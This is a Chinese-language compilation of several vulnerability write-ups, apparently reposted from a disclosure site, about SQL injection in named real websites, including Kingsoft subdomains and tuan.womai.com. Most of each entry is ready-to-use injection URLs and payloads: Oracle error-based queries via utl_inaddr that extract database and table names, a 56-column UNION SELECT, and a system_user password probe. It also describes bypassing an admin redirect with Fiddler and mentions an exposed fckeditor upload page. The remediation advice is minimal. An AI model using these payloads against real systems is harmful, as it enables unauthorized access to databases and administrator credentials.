下面是小编收集整理的金山某分站SQL注射+ROOT+后台(共含6篇),仅供参考,希望能够帮助到大家。同时,但愿您也能像本文投稿人“七侠镇潘头鱼”一样,积极向本站投稿分享好文章。
注射点:
ask.xoyo.com/index.php?act=usercenter.messageinfo&messageid={id}%20and%20exists%28select%20password%20from%20system_user%29%23
可以查询mysql.user ,应该是root权限
盲注点,
金山某分站SQL注射+ROOT+后台
,
后台:
ask.xoyo.com/admin/index.php?act=login
还存在fckeditor,估计也存在上传漏洞。
ask.xoyo.com/admin/style/js/fckeditor/editor/filemanager/connectors/test.html
具体看下图
修复方案:应该懂得!
首先是后台地址泄漏
tuan.womai.com/groupBuy/listOrderManage.jsp
后台登陆地址:
tuan.womai.com/login.jsp
登陆处存在 oracle 注入
tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' and 1=1--
tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' and 1=2--
根据反回的信息不同,存在注入,
查数据库名:
tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' or 1=utl_inaddr.get_host_address((select chr(126)||chr(39)||name||chr(39)||chr(126) from v$database where rownum=1)) and '1'='1
查表
tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' or 1=utl_inaddr.get_host_address((select chr(126)||chr(39)||TABLE_NAME||chr(39)||chr(126) from USER_TABLES where rownum=1)) and '1'='1
这里就不深入了,查出管理员用户密码进入管理后台,
或者直接是获取数据库同容了,危害应该比较大。
修复方案:
都懂得!
1. 下面这个搜索框存在注入,
2. 搜索框输入以下内容。
周杰伦' and 1=2 union select version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/*
3. 然后,数据库版本号就会出现在地址栏上,
4. 其它可获取的内容,就不一一列举了。
修复方案:
参数过滤
简要描述:上海热线某频道SQL注射
详细说明:train.online.sh.cn/Apply/applysubmit.aspx?classid=46760
存在SQL注射,数据库权限为sa,
上海热线某频道SQL注射及修复
,
因禁止远程查看应用程序错误的详细信息码故而把源码下载到本地分析,发现未过滤危险参数。可直接利用该注射获得服务器权限。
漏洞证明:
修复方案:包涵检测文件,过滤危险参数。
爱丽网子域名站SQL注射可登录后台
详细说明:主要是看到了:我是如何登录爱丽网后台的(非JS绕过、非盲打、非IP欺骗)!
看到的文章:/Article/04/83.html
进后台方法用Fiddler改返回数据包进入:
后进行测试,突发想到检测后台注入试试,然后得到后台存在注射漏洞
后台中302定向后继续显示内容的漏洞未补,造成别人可以进后台看数据
将注入点:
wed.27.cn/marry/marryadmin/web/store.php?method=getstoredetail&id=269
丢到胡萝卜中去,得到如下结果:
cmd5下可以破出来,但是貌似有乱码了
修复方案:
后台302跳转修补,过滤注射!!
i.ijinshan.com/register/verify
POSTDATA:
passport=88952634&is_mobile=1&code=88952634
修复方案:
那是金山呀,
金山网络个人中心POST SQL注射
,
。。
作者 z@cx
★ 注射室年终总结
★ 金山游记
★ 金山作文500字
★ 金山读书会作文
★ SQL实习总结
★ sql查询语句